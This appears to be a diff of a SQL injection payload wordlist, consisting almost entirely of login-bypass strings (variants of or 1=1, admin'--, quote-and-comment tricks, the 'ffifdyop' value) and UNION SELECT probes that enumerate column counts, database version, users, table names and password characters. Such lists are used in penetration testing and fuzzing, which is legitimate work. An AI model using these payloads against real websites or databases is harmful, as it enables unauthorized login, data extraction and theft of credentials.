||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
